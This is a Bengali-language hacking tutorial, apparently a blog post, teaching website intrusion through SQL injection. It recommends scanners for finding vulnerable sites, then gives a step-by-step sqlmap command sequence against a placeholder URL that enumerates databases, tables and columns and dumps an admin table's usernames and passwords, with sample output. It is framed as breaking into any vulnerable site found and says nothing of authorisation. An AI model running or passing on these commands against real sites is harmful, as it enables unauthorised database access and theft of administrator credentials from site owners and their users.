ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি হল SQL Injection !
আজকে আপনাদের দেখাবো Sqlmap এর কাজ ! যা কালি লিনাক্সে আগে থেকেই বিদ্যমান !কোনো সাইট SQL Injection এর যোগ্য কিনা তা জানতে Windows এর জন্য Nessus , Vega , Acunetix ব্যাবহার করতে পারেন ! সফটওয়্যার গুলু Google A Search দিলে পাবেন !
Kali Linux এর ক্ষেত্রে Vega,Power Fuzzar ব্যাবহার করতে পারেন !
আচ্ছা ধরেন আপনি একটা ওয়েবসাইট পাইছেন যেটা SQL Injection এর যোগ্য ! ঊপরের সফটওয়্যার গুলু বলে দিবে আপনাকে যে ঐ ওয়েবসাইট এর কোন লিঙ্কটা Vulnerable !
তাহলে ঐ ওয়েবসাইট এর Link টা হবে এমন : www.yoursite.com/index.php?id=32 !
এখন আপনার কাজ হল কালি লিনাক্স ওপেন করে টার্মিনাল ওপেন করা ! প্রথমে আমরা ডাটাবেস বের করব তারপর টেবিল তারপর কলাম তারপর সেগুলু দেখব ডাম্প করার মাধ্যমে !
তাহলে আমরা টার্মিনালে লিখবঃ sqlmap -u www.yoursite.com/index.php?id=32–dbs
তারপর
আপনার কাছে কিছু জানতে চাইতে পারে ! ভালভাবে পড়ে দেখুন কি জানতে চাচ্ছে ! যদি না বুঝেন সমস্যা নাই ! লাইন এর লাস্টে দেখুন (Y/n) অথবা (y/N) এমন আসবে ! যেটা বড় হাতের হবে সেটা লিখুন !
উদাহরন ১ : Scan all directory (Y/n) Y বড় হাতের তাহলে Y লিখে Enter চাপুন !
উদাহরন ২ : Cancle Scane (y/N) N বড় হাতের তাহলে N লিখে Enter চাপুন !
কিছুক্ষন কাজ হবে ! তারপর আপনার সামনে হাজির হবে ঐ ওয়েবসাইট এর ডাটাবেস !
এমন :
*information_schema
*yoursite
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite –tables
ভেঙ্গে বলতে হবে ??
টেবিল পাবো এমন :
user
files
admin
email
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin –columns
কলাম পাবো এমন :
admin_username
admin_password
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_username –dump
[ Username ]
[ ]
[ BOLOD ]
[ ]
[___________________]
একই ভাবে পাসওয়ার্ড বের করব :
আমরা টার্মিনালে লিখবঃ
sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_password –dump
[ Password ]
[ ]
[ 123456 ]
[ ]
[___________________]
কারো প্রশ্ন থাকলে করতে পারেন ! আর অনেকেই বলবেন হাভিঝ দিয়ে ইজি ! কিন্তু হাভিঝ দিয়ে অনেক সাইট এর ডাটাবেস আসে না ঝামেলা করে !